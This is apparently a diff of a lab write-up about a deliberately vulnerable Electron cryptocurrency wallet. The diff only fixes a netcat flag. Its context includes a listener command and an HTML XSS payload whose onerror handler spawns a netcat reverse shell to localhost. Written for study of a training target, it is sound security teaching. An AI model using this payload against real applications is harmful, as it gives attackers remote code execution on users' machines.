5049504F/5049504f.github.io/_posts/2019-06-04-Write-Up-DVCW-Part-1--Electron.md

 Note: In order to test this case, it is important that we prompt the Electron application without proxying the content with Burp as the shells will attempt to use the same connection settings that the main application, and Burp will drop down every connection which is not HTTP.

-First, we set up our listener with `nc -lbp 80` in the same box we are running the application.
+First, we set up our listener with `nc -lvp 80` in the same box we are running the application.
 Then, we will use the following payload in the message of a new transaction
 ``` html
 <img src=x onerror="var Process = process.binding('process_wrap').Process;var proc = new Process();proc.onexit = function(a,b) {};var env = process.env;var env_ = [];for (var key in env) env_.push(key+'='+env[key]);proc.spawn({file:'/bin/sh',args:['sh','-c','nc -ne /bin/bash 127.0.0.1 80'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});">
 ```